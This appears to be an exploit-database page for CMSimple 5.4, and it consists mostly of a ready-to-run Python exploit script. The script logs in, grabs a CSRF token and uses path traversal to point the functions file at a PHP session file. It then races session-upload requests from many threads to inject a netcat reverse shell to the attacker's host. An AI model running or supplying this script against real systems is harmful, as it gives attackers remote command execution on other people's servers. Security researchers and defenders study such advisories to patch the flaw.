CMSimple 5.4 Local File Inclusion / Remote Code Execution

2021.11.25
Credit: S1lv3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated) # Date: 11/15/2021 # Exploit Author: S1lv3r # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/ # Version: CMSimple 5.4 # Tested on: CMSimple 5.4 # writeup: # https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities #!/usr/bin/python3 import requests import threading import datetime import sys from bs4 import BeautifulSoup x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) Time = x + addSeconds proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",} def Login(): try: global Time s = requests.Session() headers= {"Content-Type": "application/x-www-form-urlencoded"} data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login' response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies if response.cookies['passwd']: print("(+) Sucessfully Logged In With " + User + ":" + Password) cookies = response.cookies params = (('file', 'config'),('action', 'array'),) response = s.get(RHOST ,cookies=cookies ,params=params,verify=False) soup = BeautifulSoup(response.text, 'lxml') CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value'] print("(+) Get CSRF Token : [ " + CsrfValue + " ]") data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save' response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False) print("(+) Changing Functions file Done ") print("(+) Check Your nc listner on " + LPORT) except Exception as error: print("Error, Exiting;( ") print(error) pass def fuzz(): while True: try: sessionName = "S1lv3r" cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS':(None, '<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'), 'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')} x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) CMSimple LFI to RCE \n") Login() threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) <= 5: print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) SiLvEr \n") exit() else: RHOST = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] User = sys.argv[4] Password = sys.argv[5] main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top